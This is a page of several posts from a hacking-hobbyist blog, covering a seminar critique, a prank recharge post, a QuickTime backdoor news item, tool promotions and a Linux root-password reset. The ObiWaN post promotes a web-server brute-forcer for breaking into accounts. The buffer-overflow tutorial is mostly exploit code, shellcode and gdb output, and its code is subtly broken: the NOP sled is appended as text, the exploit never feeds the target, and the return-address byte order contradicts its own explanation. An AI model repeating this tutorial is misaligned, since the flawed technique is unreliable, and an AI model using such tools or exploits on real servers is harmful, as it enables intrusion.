Ankit Fadia's Seminar through the eyes of a Security Enthusiastic - Overrated, Overhyped & Pure waste of Time

AFCEH 5.0 - Now this blows - theprohack.comAnd there we go, I came to know about the renowned Ankit Fadia coming to my humble college & I was wondering if he will be different from those other security organizations who teach computer security & ethical hacking.
He was worse.
No offense to Mr Fadia, but actually I was quite saddened by some of the questions which he asked-

How many of you use Google as a search engine ?
(Almost all of hands raised)
He Proclaimed - STOP USING THEM !!
How many of you use email services like Gmail, yahoo?
(A lot of hands raised)
He Exclaimed - STOP USING THEM !!
How many of you use internet ?
(again..some of hands raised)
STOP USING THEM !!
And behind the above "Stop Using Them!!" there were some cheesy reasons of privacy invasion & record tacking. I wondered why he was not educating about how to use services like Scroogle/TOR/SOCKS for safe surfing (albeit nothing is safe, but still, they provide a greater degree of anonymity). Then..it all begin.
The Session Began - theprohack.com
Part 1 - Screwing the Proxies
Then the hacking prodigy demonstrated his magical wits by recommending Russian proxy servers cuz "they were maintained by criminals" & "they kept no logs" .
F**INGBULLSHIT !!
Why the hell ! We can never trust a proxy if it keeps logs or not, that's why we always use SOCKS & proxy chaining to get the work done, even when I start something casual, i chain 10 proxies using a TOR network to get the work done, & that guy was recommending anonymizer.com & anonymizer.ru . And we shall trust Russian proxy cuz its maintained by criminals ? what an oxymoron ! His ace in hole in the proxy demo was the Princeton university proxy list where he claimed that to black all of the proxies it will need 413 individual tries ! A friend of mine asked -
"Well Mr Fadia, what if you block the Princeton university site ?"
pat came the nervous reply
" Appoint a junior of yours to go into local cybercafé to get the list, Xerox it and distribute in college"
Pure F**king Genius !
He went on to use SPYPIG to get IP of any person using an image. but he didn't get on the point that what if a person has disabled image viewing on email. Anyways..it all ended with a lot of questions which he dodged by saying that there will be a query session in the end. Ah well..

Part 2 - the infamous NETBUS DEMO
I patiently waited to ask him some questions regarding IP evasion & anonymity but he started to demo NETBUS Trojan, without any logic he went on to demonstrate how he can open his CD/DVD drive on his DELL Studio 14" (by installing a Trojan server on his own laptop & executing commands on local loopback & he didn't explained it, that's why its in f**king brackets !) . I asked him, on getting chance from my trusted roommates & event co-ordinators Sumit Dimri & Varun Kumar Singh & asked him 2 simple questions (Of course I already knew the answers) -
  • What happens if a person is behind a NATBOX/Router/Firewall, then there is no use of getting IP, it might not be forwarded at all. What then ?
  • Trojans are invalid against Linux. What can you do to break into Linux Security ?
He responded by dodging the first question & diverting it to a social awareness bullshit & some problem solving (which I cant seem to remember cuz it was irrelevant). The second question was answered by saying that Windows is insecure & I myself use Ubuntu linux at home.

Again...Pure F**King genius - theprohack.com

Again..Pure F**king Genius !


From that point i got the point that he has no point :D
We moved on to the Steganography / Final session then.


Part 3 - the Steganography / Final session

The steganography session was started by exclaiming that he was contacted by FBI on 9/11 attacks (which i already knew as a matter of fact is fake courtesy of Attrition.Org & various LUG's out there) & they used images of sexy women to transmit data into them. He used a tool to hide text data into image & reverse it, nothing special, if you have been a reader of my blog I guess you probably know that Nettools allow you to do that. Then he demonstrated Bluetooth hacking by using bluesnarf (just a scan) & website hacking using SQL injection (again..nothing special) with no logical explanation of how the injection worked. The session ended by "Roadside Sign hacking" in which he displayed pics on projector of hacked road signs by hackers at USA, Australia & other countries.

He then begin to advertise Dell laptops & the highly prestigious (READ: BELOW AVERAGE) AFCEH course conducted at Reliance Webworld. Then he ran away cuz he was running short of time & no Query Session was conducted.

Aftermath : Pure F**king Genius !

I guess you realize what I felt for the whole seminar & the whole Ankit Fraudia oops.. Fadia hype..

My Feedback form read -

Name : Rishabh Dangwal
Qualification: Btech
Branch : CSE
Remarks : Ankit Fadia is Overrated..Overhyped & pure waste of time. If you are bored, do come to Fadia for a few laughs. Peace.

EOF

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

by Rishabh Dangwal · 46

Free Recharge Any Mobile Hack – Applicable on All networks :)

Yep..I perfectly know why you are here..You wish to recharge your phone for free, probably just for funs sake or just Free Recharge Any Network - theprohack.com cuz you are dying to talk with your girlfriend but don't have balance for it..or you are just here to do it for educational purposes, which is a pretty lame excuse but I can digest that. Anyways..here we go..

What you need ?

  • Email ID
  • Cellphone
  • A registered number & sim
  • Patience

FREE Mobile Recharge Any Network - theprohack.com

How to Do it ?

open your email account by entering your username & password, & drop an email to your telecom service provider -

Dear Sir/Madam/Whatever

I would like to bring to your attention that I have been trying to learn how to recharge my cellphone account for free by searching on the internet but in vain. I am very hopeful that I would be able to find an authentic way to top up my account for free one day.

I have this funny feeling that you organization is a silly company who will allow me do unlimited top ups on my account.

Anyhow, I am a good guy and would resort to extreme ways,rather I humbly request you to provide me the recharge code of atleast 5000 INR.

Thanks for your cooperation.

Regards

Your biggest Fan :)

9XXXXXXXXX

That was easy…isn't it ?

 Just Kidding folks..I was having some harmless fun at your expense.

How actually you can Recharge your cellphone / top up for free ?

Open Notepad & type

I am fooling around with this article thats making a fool of me :)

WTF ?

Still reading ? Ah well..Sorry once again guys..Actually, what I was thinking that upto this point, any self respecting noob might have closed the browser window and moved on to a different page.

I wrote this article as I was inspired by the fake recharge/top up code calculator programs scattered all over the internet. Especially this one in which a hex editor is provided to the unassuming audience in order to increase blog SEO.Great..now on to the actual topic, you CAN have free calls, unlimited SMS & every other facility for your cellphone. You need to have (Cheap method) -

  • Asterisk SwitchVOX
  • SIP connection (Session Initiation Protocol)
  • Knowledge of Linux + Servers
  • Lots of time

OR

You can have

  • Lots of Money
  • MINSAT (Mobile Intelligent Network Service Administration Tool)
  • Internet connection
  • Lots of knowledge + time (again!!)

Due to some constant bullying by legal guys, I cant really publish the full method to go with recharges, but atleast I can give cues :D

The Intelligent will find the way..

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

by Rishabh Dangwal · 27

Devil May Cry 5 Trailer Impressions

WTF ? DMC5 ? at TGS 2010 ? released on 15 september, I got hold on the DMC 5 traileror you can say DmC trailer.For those who dont know what Devil May Cry is, go to the corner & wear the dunce cap ! Devil May Cry is the hack & slash action game series by Capcom featuring one of the most intricate fighting system & coolest protagonist Dante, its the game against which other Hack & slash games are measured!! The new DmC  is said to be a reboot of the series.  REBOOT ?!! Ah well.. I will come to the point later, lets first have a look at the trailer.

DmC / Devil May Cry 5 Trailer TGS 2010

Man..what were they thinking ? Where the hell is all badass Dante ? The silver haired demon slayer has been dumped for this skinny juvenile ? & a Reboot ? What happened to Nero ? What about the legend of Sparda ? Man..even Hideki Kamiya, the creator of DmC commented Dante ?!!! Ah gross !!!
“I miss him, too…” and later added “I’ve been sad since Dante left me.”
In a later tweet when a fan asked the question:
“DmC by Ninja Theory? Do you think they will evolve the action game from your Bayonetta standard?”,
Kamiya-san simply said:
    “whatever”
See ? Dear Folks at Ninja Theory..Better be the game badass, else while this new Dante might prove your last stand.
Well..looking at the trailer, some things pass my mind -
  • New Dante looks like ass!
  • It might not be a reboot at all (.0001% chance) & this might be the story of an abandoned Dante struggling with his goddamn teenage, & later at the end of game, the prologue of Devil May Cry 3 begins.
  • The visuals are improved, especially the blur & sonic effects.
  • The new weapon is ass! Except the Sword..I dont like the Daggertail like thing Dante holds..The Dante I knew like to take things Up close & PERSONAL !.
We miss you Dante..
like this post ? you can buy me a beer :)
Posted by XERO. ALL RIGHTS RESERVED.Source

by Rishabh Dangwal · 0

Marshald Punk pwns Quicktime & Windows – 9 Years Old Flaw

Great…just came to know from “El Reg” how an obsolete parameter in a program separate from OS can wreak havoc. Marshald Punk pwns Quicktime & WindowsWorse, when it was a development flaw which has been in the lurch,undetected for last 9 years. A spanish security  researcher,Ruben Santamarta recently unearthed a backdoor in Apple Quicktime player that can be used to remotely exploit arbitrary code on Windows based systems. The backdoor “_Marshaled_pUnk” is bizzare in nature as it is the work of an Apple developer who added it to to the QuickTime code base and then, most likely, forgot to remove it when it was no longer needed.Adding salt to it, this can be used to exploit to take FULL control of even the latest of Windows OS- Windows 7. As told by H D Moore, CSO of Rapid7 and chief architect of the Metasploit project, to “El Reg” on monday -

“The bug is is pretty bizarre,It's not a standard vulnerability in the sense that a feature was implemented poorly. It was more kind of a leftover development piece that was left in production. It's probably an oversight.”

How the punk pwned ?

Schemes like DEP , or data execution prevention prevents any code from being executed & ASLR, or address space layout randomization, loads code into locations that an attacker cant predict there by securing parameter to some extent in Windows architecture. “_Marshaled_pUnk” however creates an object pointer equivalent that an attacker can use to load & malicious code into computer memory. In a witty maneuver, Santamarta  used a technique called return oriented programming also known as ROP to load code by loading WindowsLiveLogin.dll  into memory & reordered the commands in a way that allowed him to gain control of the testbed. Using the Microsoft DLL not only allowed him to know where in memory it would load, it also allowed him to get the code executed.

What next ?

Santamarta confirmed the exploit on the XP, Vista, and 7 versions of Windows. He also said that the parameter existed in QuickTime version dating back to 2001, when it could be used to draw contents into an existing window instead of creating a new one. The functionality was eventually removed from newer versions but the line lived on. Combined with an unrandomized DLL like the one for Windows Live, it represents a serious threat to end users. The flaw has demonstrated that the threat comes from the programs that fail to use ASLR & DEP protections, surprisingly as reviewed by Secunia ,a large number of popular applications — including Quicktime, Foxit Reader, Google Picasa, OpenOffice.org, RealPlayer, and VLC Player — neglect to use one or the other.

Till then..wait for Apple to release a patch for the 9 year old Punk.

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.Source

by Rishabh Dangwal · 0

Packet-O-Matic – An Open Source Realtime Packet Processor

Packet-o-matic is a modular real time packet processor under the GPL license. It reads the packet from an input module, match the packet using rules and connection tracking information and then send it to a target module. The modular nature of packet-o-matic allows it to work for any protocol as long as its corresponding module is found. The built in management console allows you to telnet in packet-o-matic and change the configuration in real time. Main features of Packet-o-matic are :

  • connection tracking currently for ipv4, ipv6, tcp, udp, rtp
  • ip reassembly, tcp reordering
  • match the complete protocols encapsulation i.e. "ethernet->ipv6->ipv4->udp->rtp"
  • process all the packets in real time to provide the desired output

What it can do ?

  • save all the VoIP calls going on an interface in separate files in real time
  • reinject packets destined to a specific ip and port on another interface or save them in a file
  • dump each file of all the http connections in separate files on the disk
  • show the important info and an hexadecimal dump of each packet while doing the above three at the same time
  • lots of other stuff which would be too long to list here

Operating System Supported : Linux

Download Packet-o-matic

Visit Official Website

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.

by Rishabh Dangwal · 0

ObiWaN – Server Bruteforcer by Phenoelit

ObiWaN is the brainchild of Phenoelit, a german hacker group headed by elite hacker FX which is written to carry out brute force security testing on Webservers. The goal of ObiWaN is a brute force authentication attack against Webserver with authentication requests - and in fact to break in insecure accounts. As the official documentation says -

ObiWan is written to check Webserver. The idea behind this is: Webserver with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. In fact this is the point to start from. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it.
Like other programs for UNIX system passwords (crack) or NT passwords (l0phtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since Webservers allow unlimited requests it is a question of time and bandwith to break in a server system.

ObiWaN -server bruteforcer - theprohack.com

ObiWaN manipulates a weakness in HTTP protocol, which as explained by Phenoelit itself is that nearly all servers allow unlimited username/password tries for a user & it literally becomes a question of time and bandwith to break in a server. After you break-in,you are the alpha & the omega of server..

enjoy :)

Download ObiWaN

Read Documentation

 

like this post ? you can buy me a beer :)

Posted by XERO. ALL RIGHTS RESERVED.

by Rishabh Dangwal · 0

5 more sites for Security Basics

last time I blogged about 5 sites for Budding Hackers & followed up with  5 more sites for budding hackers... but as the user queries flood my inbox for more, I decided to dig a bit more & publish some of the more prominent sites I visit in my free time. The following blogs are prominient & hot favorites for security essentials & are full of resources which will enhance your skill set. A must visit list -

Securitytube
watch-learn-contribute..A site packed with lots of security related videos,resources & up to date news.

Offensive Security
Need I say more ? The creators of the reknowned security distro Backtrack maintain one of the best happening forums on security. The link above relates to backtrack tutorials & forums, explore & learn..as always,the quieter you become, the better you are able to hear.

SmashTheStack
Like Wargames ? Smash the stack is your portal for the ultimate wargames which will escalate your level from nothing to something..pay attention,play well & learn.

PaulDotCom
One of my favorite security podcasts,the website provides insightful papers,presentations & discusses on hot security topics.

Tuts 4 You
Reverse engineering anyone ? Tuts4You is a community for researchers and reverse engineers interested in the field of Reverse Code Engineering (RCE). Great tuts..Great resources..

Like This post ?  You can buy me a Beer :)
Posted by XERO. ALL RIGHTS RESERVED.


by Rishabh Dangwal · 0

Password recovery & hostname changes in linux

So..it recently happened to me when I while messing with my system, i wrote a script to change root password & set it to expire in every 7 days & simultaneously making changes to hostname by setting it to a random value.. I queried my friend Raghu for inputs regarding it & got some interesting results,which I will be compiling here. This tutorial is intended for Linux newbies & would help them to get familiar with the enviornment. Actually, after 7 days what happened I tried to log in,& it always said "root password expired, please contact your administrator"..seems familiar ? well..here is how you can eradicate this.

( PS:
Folks..if you think you are too dumb to do
that, there exists an automated "burn-the-cd-boot-&-forget-solution"
called KONBOOT which can reset Linux passwords if you care.. :D choose your pick
)

I actually rebooted the system & once I reached grub,selected the kernel, I pressed "e".I proceeded to 2nd line of configuration & pressed "e" again.

kernel /boot/vmlinuz-2.6.34.6-47.fc13.i686 ro
Obviously, I edited the file by pressing "e" again & modifying it by typing "single" for invoking single user mode in Linux.
kernel /boot/vmlinuz-2.6.34.6-47.fc13.i686 ro single
Press "b" key to boot. Afterwards, you are given a prompt, please enter "passwd" command to reset root password.
After that, login as root & then proceed to move to /etc/shadow

[root@zion XERO]# cd /etc
[root@zion etc]# vi shadow
& check the entry for root,it should look similar to this

root:$6$McKhE96JGhl$uIfjBcMrrrL2x8aJ17mATex8WNXVMvZXrsfqoOL.
CinR9W2C8VXVyt4W2yt4eAJ0tgNPU2Kftr1f/lcvDG.:14859:0:99999:7::1:

you can see there is a "1" in last entry which sets the root account to expire. remove it such that it becomes

root:$6$McKhE96JGhl$uIfjBcMrrrL2x8aJ17mATex8WNXVMvZXrsfqoOL.
CinR9W2C8VXVyt4W2yt4eAJ0tgNPU2Kftr1f/lcvDG.:14859:0:99999:7:::


Once done, save the file & exit by pressing :wq! in vi. After that, boot into graphical mode by typing

[root@zion XERO]# init 5
login with your password."root" problem solved :) After wards..i found out that my hostname was changed..so, here are three easy ways to change your hostname on your will.

Way 1
open console, & type
[root@zion XERO]# hostname
NETWORKING=yes
HOSTNAME=hosty.test.com
now you can reset hostname (for the given session) by typing -
[root@zion XERO]# hostname myhostname.mysite.com
where myhostname.mysite.com is your new hostname.

WAY 2
The second way deals with editing a file known as "network" located in /etc/sysconfig/network, navigate to it

[root@zion XERO]# cd /etc/sysconfig/
check the value of hostname in it
[root@zion sysconfig]# cat network
NETWORKING=yes
HOSTNAME=hosty.test.com
time to change it, go to vi & edit it.
[root@zion sysconfig]# vi network
NETWORKING=yes
HOSTNAME=myhost.testsite.com
~                                                                                                             
~                                                                                                             
~                 
:wq!
saved the file..reboot & its done :)

WAY 3
The third way deals with "sysctl" command, which can be used to change the variable kernel.hostname. Start by checking its current value by typing

[root@station3 sysconfig]# sysctl kernel.hostname
kernel.hostname = hosty.test.com
and to change it, enter

[root@station3 sysconfig]# sysctl kernel.hostname=MYHOST.TESTSITE.COM

where MYHOST.TESTSITE.COM is your new hostname.
All of this was scripted,tested in FEDORA 13 (2.6.34.6-47.fc13.i686) & written using Scrib Fire
 .

I hope it was interesting :)

Like This post ?  You can buy me a Beer :)
Posted by XERO. ALL RIGHTS RESERVED.

by Rishabh Dangwal · 0

Buffer Overflow Attack tutorial by example

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example <inputting a very large value in a c program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn..

Our vuln program:
---------- bof.c --------------
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf("Done");

return 0;
}
---------- bof.c --------------
As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think - What happens when we load more than 10 bytes on str? You'll see.

Lets try compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$

The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren't enough to overflow the program.


Lets try to overflow the program with 14 bytes:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$

Failed. Again.

Lets load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$
In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we'll check more further what exactly happend:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141       0x41414141


We overwrited the EIP with A's (A = 41 in hex) - The EIP is the Instructor Pointer, it points at the next instruction.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.

---------- exploit.c --------------
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
int i;
/*
 * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
 * - izik <izik@tty64.org>
 */
char shellcode[] =    
    "\x6a\x05"              // push $0x5
    "\x58"                  // pop %eax
    "\x31\xc9"              // xor %ecx,%ecx
    "\x51"                  // push %ecx
    "\xb5\x08"              // mov $0x8,%ch
    "\x68\x64\x72\x6f\x6d"  // push $0x6d6f7264
    "\x68\x65\x76\x2f\x63"  // push $0x632f7665
    "\x68\x2f\x2f\x2f\x64"  // push $0x642f2f2f
    "\x89\xe3"              // mov %esp,%ebx
    "\xcd\x80"              // int $0x80
    "\x89\xc3"              // mov %eax,%ebx
    "\xb0\x36"              // mov $0x36,%al
    "\x66\xb9\x09\x53"      // mov $0x5309,%cx
    "\xcd\x80"              // int $0x80
    "\x40"                  // inc %eax
    "\xcd\x80";             // int $0x80

for(i = 0; i < 512; i++)
    strcat(exploit, "0x90");

strcat(exploit, shellcode);

printf("Loaded.\n");

return 0;
}
---------- exploit.c --------------

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.

Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we'll look for the ESP - the ESP points on the last element used on the stack.
Check this out:

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp

You're gonna get these things:

0xbf949694:      "`???}_???o??\002"
(gdb)
0xbf9496a2:      ""

etc'...
Keep searching until you see something like this thing:

0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?\002?\224?\024?\224?*?\224?3?\224???\224??\224?\v?\224?\030?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?\025?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?\024?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?"

0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We'll take our old address (0xbf9496e0) and do this thing:

Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we'll block the characters between \'s (slashes), add x in each block -> \xe0\
you'll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:

0xbf9496e0 -> \xe0\x96\x94\xbf

Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's),
and our RET's length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A's,
and we are gonna print 28 A's (32 A's - 4 bytes (RET's length) = 28) and the RET so we could reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf
"\xbf\x94\x96\xe0"`

I suppose you already understood what's about to happen if you have read the exploit :)


Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

by Rishabh Dangwal · 1

SImple Malware Scanner (Offline & Online)

Earlier I wrote about how to scan a file using multiple antiviruses online, however, alternatively you can check the md5 hash of the file & compare it to the valid one in an offline database..or can validate it at an online one like VirusTotal. The specified action is done by a program known as "Simple Malware Check Tool" developed by Mert Sarica. The program has http proxy support & update feature.

 Simple Malware Scanner - theprohack.com


You can easily check the hash by running -

python malware_check.py online malware.exe
This command calculates the md5 hash of a specified file (ex: malware.exe), submits it to http://www.virustotal.com
and then shows the result. To check Offline, you need to run -
python malware_check.py offline malware.exe
This command takes the md5 hash of the specified file (ex: malware.exe) and searches it in its current hash set (hashset.txt)
and then shows the result.
python malware_check.py update
This command updates its current hash set (hashset.txt) by crawling threat information from http://www.avira.ro &
includes information like virus name, virus type, md5 hash of the virus, severity and discovered date. If there is a hashset.txt it just up to date its current hash set to the latest.

To add proxy support simply edit the .py script and add in the relevant proxy details.

proxy_info = {
    'user' : 'username', # proxy username
    'pass' : 'password', # proxy password
    'host' : "proxy host", # proxy host
    'port' : 8080 # proxy port
    }

You can download the Malware Check Tool here:

Download Malware Check Tool


Like This post ?  You can buy me a Beer :)

 

 

Posted by XERO. ALL RIGHTS RESERVED.

by Rishabh Dangwal · 0

Long time no see

Hi folks..
Sorry for quite a late update..1.6 months is quite some time to be quiet (pardon for the pun). I was fiddling with reverse engineering tools, working with Secugenius, meeting old friends & more..and I guess the vacation is over..I have moved on to Linux (Fedora 13, Goddard) & I am enjoying every bit of it..I have moved on to my final year of engineering and have been getting quite a lot of job offers lately. Was pondering over the possibilities while fiddling with my interests :)


Well..I am back,& have met quite some folks in the mean time..Will be sharing my experiences hers..

stay tuned & thanks for supporting my blog in the mean time..

Rishabh Dangwal
"xero"

by Rishabh Dangwal · 0

All Rights Reserved by Pro Hack . Copyright 2008 - 20011. Template by Bloggermint .